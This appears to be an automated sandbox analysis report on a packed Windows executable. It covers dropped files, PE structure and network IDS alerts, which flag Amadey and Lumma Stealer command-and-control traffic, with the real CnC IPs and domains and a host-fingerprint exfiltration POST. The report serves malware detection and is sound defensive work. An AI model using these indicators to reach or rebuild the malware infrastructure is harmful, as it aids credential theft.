                                                                                                                                                                                                                                              SHA-512:1B90DD66592522EB2D69B89E328D8ECF9B57D9A3C7C85E19EB297BF6BFF4C1964D9CDE4FFEBDB744CDEA3620370BD6619E510947768E670F97F9B9B171BA9AE6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:7....-..........>}.B.,..G.Q...........>}.B.,..3....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10085
                                                                                                                                                                                                                                              Entropy (8bit):5.535175527138315
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:WnaRtZYbBp6Khj4qyaaX86KakfGNBw8dYSl:xeUquOcwL0
                                                                                                                                                                                                                                              MD5:21D09A11FB9551CCC1603A6C700CC426
                                                                                                                                                                                                                                              SHA1:01F1ADEDEED4439AC2CCA043FB75087FA3F173EB
                                                                                                                                                                                                                                              SHA-256:50962CCE08F1B249618D7BA620E93D5F84026F61319BFA561C258745DBC21E7A
                                                                                                                                                                                                                                              SHA-512:41D59F9EBE1124C1F0B1EEB88D7B84FA52763E59A837B1661E0ED5CD01F7CF7FD2DF8E424583EB1D3354A3FE4D5CE69B2CAFF2FDC0F782F0FD4B77818EFCA8F4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.up
                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10085
                                                                                                                                                                                                                                              Entropy (8bit):5.535175527138315
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:WnaRtZYbBp6Khj4qyaaX86KakfGNBw8dYSl:xeUquOcwL0
                                                                                                                                                                                                                                              MD5:21D09A11FB9551CCC1603A6C700CC426
                                                                                                                                                                                                                                              SHA1:01F1ADEDEED4439AC2CCA043FB75087FA3F173EB
                                                                                                                                                                                                                                              SHA-256:50962CCE08F1B249618D7BA620E93D5F84026F61319BFA561C258745DBC21E7A
                                                                                                                                                                                                                                              SHA-512:41D59F9EBE1124C1F0B1EEB88D7B84FA52763E59A837B1661E0ED5CD01F7CF7FD2DF8E424583EB1D3354A3FE4D5CE69B2CAFF2FDC0F782F0FD4B77818EFCA8F4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.up
                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):90
                                                                                                                                                                                                                                              Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                              MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                              SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                              SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                              SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):90
                                                                                                                                                                                                                                              Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                              MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                              SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                              SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                              SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 131075, last written using SQLite version 3042000, page size 512, file counter 6, database pages 8, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                                                              Entropy (8bit):2.0836444556178684
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:JBwdh/cEUcR9PzNFPFHx/GJRBdkOrDcRB1trwDeAq2gRMyxr3:jnEUo9LXtR+JdkOnohYsl
                                                                                                                                                                                                                                              MD5:8B40B1534FF0F4B533AF767EB5639A05
                                                                                                                                                                                                                                              SHA1:63EDB539EA39AD09D701A36B535C4C087AE08CC9
                                                                                                                                                                                                                                              SHA-256:AF275A19A5C2C682139266065D90C237282274D11C5619A121B7BDBDB252861B
                                                                                                                                                                                                                                              SHA-512:54AF707698CED33C206B1B193DA414D630901762E88E37E99885A50D4D5F8DDC28367C9B401DFE251CF0552B4FA446EE28F78A97C9096AFB0F2898BFBB673B53
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                                              Entropy (8bit):3.4065748901211066
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:eX3XflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lBnl/Al0ut0:wnf2RKQ1CGAFAjzvYRQVBnCldt0
                                                                                                                                                                                                                                              MD5:52D6B17A49990F2A112B31790313B481
                                                                                                                                                                                                                                              SHA1:7C219E766C1027B393AD06B76BDB2EEF1624B9D4
                                                                                                                                                                                                                                              SHA-256:EF38EC152F3C327A32525A94CE9E841B334BC620A0B91CBA8A3C71C00E7928A1
                                                                                                                                                                                                                                              SHA-512:677A901E20C4142A235D5A3B3B3A828548C6E6517EAE7987751CE31F887A538987EA227AAE7CA753ABA57345BDE67476EC0DC754A61E220631C377618D415134
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:......|'c..@.U...~W*F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):133746
                                                                                                                                                                                                                                              Entropy (8bit):5.436489539509503
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:2PCvjxd0QniyZ+qQf4VBNQ0pqGvx7U+OUaKszQ:ECvv0yTVBNQ0pVvxI+ORQ
                                                                                                                                                                                                                                              MD5:016232CE8BB83C5140B41E502CBCE3DC
                                                                                                                                                                                                                                              SHA1:D69CFF5C00EB47230E9B7201533B72FDFF82FE71
                                                                                                                                                                                                                                              SHA-256:A6683B135E2CF3E81974EC7E437CC22AED2A7D9B402FD2AEC6839C0BDA6AA699
                                                                                                                                                                                                                                              SHA-512:BCDAE0DE00A1319CD556539D582B7DD54FFA0DE74B28C02FC35F6C1C02B8D6D9C189F93F4D7EB299456D08D61E8848A8BD429786B2BCEEFEF024411C8B3F8F2B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_1d gb_Pe gb_pd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Od\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_jd gb_nd gb_Ed gb_kd\"\u003e\u003cdiv class\u003d\"gb_vd gb_qd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):19
                                                                                                                                                                                                                                              Entropy (8bit):3.6818808028034042
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:VQRWN:VQRWN
                                                                                                                                                                                                                                              MD5:9FAE2B6737B98261777262B14B586F28
                                                                                                                                                                                                                                              SHA1:79C894898B2CED39335EB0003C18B27AA8C6DDCD
                                                                                                                                                                                                                                              SHA-256:F55F6B26E77DF6647E544AE5B45892DCEA380B7A6D2BFAA1E023EA112CE81E73
                                                                                                                                                                                                                                              SHA-512:29CB8E5462B15488B0C6D5FC1673E273FB47841E9C76A4AA5415CA93CEA31B87052BBA511680F2BC9E6543A29F1BBFBA9D06FCC08F5C65BEB115EE7A9E5EFF36
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              URL:https://www.google.com/async/ddljson?async=ntp:2
                                                                                                                                                                                                                                              Preview:)]}'.{"ddljson":{}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (827)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):832
                                                                                                                                                                                                                                              Entropy (8bit):5.157891967982503
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:GS4jMmdi4mSuSSwaBHslgGeT9lCuABuoB7HHHHHHHYqmffffffo:GDjbi4m5oaKlgGeZ01BuSEqmffffffo
                                                                                                                                                                                                                                              MD5:1904215B543F16A21F6C250052F25448
                                                                                                                                                                                                                                              SHA1:DE85BEF440ABDE29CB6AC742F7B3287D96882F99
                                                                                                                                                                                                                                              SHA-256:761947FC5E2B2D9B585FD4933240727DB370D9EC22C44C838892C41E3CA554D0
                                                                                                                                                                                                                                              SHA-512:FC5580F5963C587B93FB12B529BD2DB1AC868364E330A1CEE65FDFA94D2259FE3357520C67D223904A50692A5792C4DF4D9D3F8D5C7CF688F4B2186DFE4F31F1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                              Preview:)]}'.["",["el dia de los muertos 2024","netflix streaming movies","mega millions winning numbers","mario kart 8 happy meal toys","jorge soler braves trade","hawaii mauna kea snowfall","viswam movie gopichand ott platform","jobs report unemployment"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:fieldtrialtriggered":true,"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                              Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                              MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                              SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                              SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                              SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.9488282759970845
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                                                                              File size:1'894'400 bytes
                                                                                                                                                                                                                                              MD5:1e33e63c356ac4032505c4a3f7157786
                                                                                                                                                                                                                                              SHA1:d269e43d5e8439e0a033b3291963b478308f5934
                                                                                                                                                                                                                                              SHA256:dc143828ace64c6a5de6fd23b99b0b5c73c49f3b1a2a1a585ec356ecd57eaf13
                                                                                                                                                                                                                                              SHA512:68cba85d1100b31110d866edeb66d5066f12ab8e36e1aeaad78279edd31a013573fb377f364d9b0492aff3b0f2de95cf27dc6779cf14677bc349f4f55d6b04e6
                                                                                                                                                                                                                                              SSDEEP:49152:NEmEI2wiR3hAOyNuf5PLgDQjzq9GnkyPzxJDMY:NEmH2Nhx7fdIdSPlJ4
                                                                                                                                                                                                                                              TLSH:CA9533CA9DE3702FE71270FEC2B251B4EBAD14974F5912C1611AA67700B363C35A6A7C
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                              Entrypoint:0x8b0000
                                                                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              jmp 00007F2EE47C490Ah
                                                                                                                                                                                                                                              shufps xmm3, dqword ptr [eax+eax], 00h
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add cl, ch
                                                                                                                                                                                                                                              add byte ptr [eax], ah
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [edx], al
                                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add bh, bh
                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x344.rsrc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x4aebb00x10uqbleicu
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x4aeb600x18uqbleicu
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              0x10000x680000x2de0086ddec3580df1c592a26a5f7365f23ffFalse0.9981586341961853data7.986185819192592IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .rsrc0x690000x3440x400982623c07c43a8169da5c3bd55ce4d06False0.4345703125data5.395849414192414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              0x6b0000x2a70000x2000ca07fb98c15845bb36aa18900882baeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              uqbleicu0x3120000x19d0000x19cc00b78f6605b5c6708207fb4f6e859cb035False0.9948190727210782data7.9530760325425325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              hvgssyyw0x4af0000x10000x4006a85e0d51e5bd0982bd2272701b3415dFalse0.703125data5.637368637213756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .taggant0x4b00000x30000x2200120bbe5e3ad9e3a24d770f7d8da8b786False0.06548713235294118DOS executable (COM)0.7731854023039351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                              RT_MANIFEST0x690700x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                                                                                                                                                              RT_MANIFEST0x691c40x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                              EnglishUnited States
                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                              2024-11-02T07:16:05.735472+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.463773185.215.113.4380TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:09.037886+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.463794208.109.77.11680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:11.766943+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.463787TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:12.728113+01002856121ETPRO MALWARE Amadey CnC Activity M21192.168.2.463813185.215.113.4380TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:13.854592+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.463819185.215.113.1680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:18.925304+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.4508681.1.1.153UDP
                                                                                                                                                                                                                                              2024-11-02T07:16:18.940561+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.4540871.1.1.153UDP
                                                                                                                                                                                                                                              2024-11-02T07:16:18.952164+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.4563711.1.1.153UDP
                                                                                                                                                                                                                                              2024-11-02T07:16:18.963214+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.4552651.1.1.153UDP
                                                                                                                                                                                                                                              2024-11-02T07:16:19.017132+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.4596451.1.1.153UDP
                                                                                                                                                                                                                                              2024-11-02T07:16:19.674142+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.463854188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:19.674142+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.463854188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:20.299336+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.463854188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:20.299336+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.463854188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:20.309414+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.463856185.215.113.4380TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:21.066251+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.463867188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:21.066251+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.463867188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:21.270569+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.463862185.215.113.1680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:21.767257+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.463867188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:21.767257+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.463867188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:22.674369+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.463873188.114.96.3443TCP
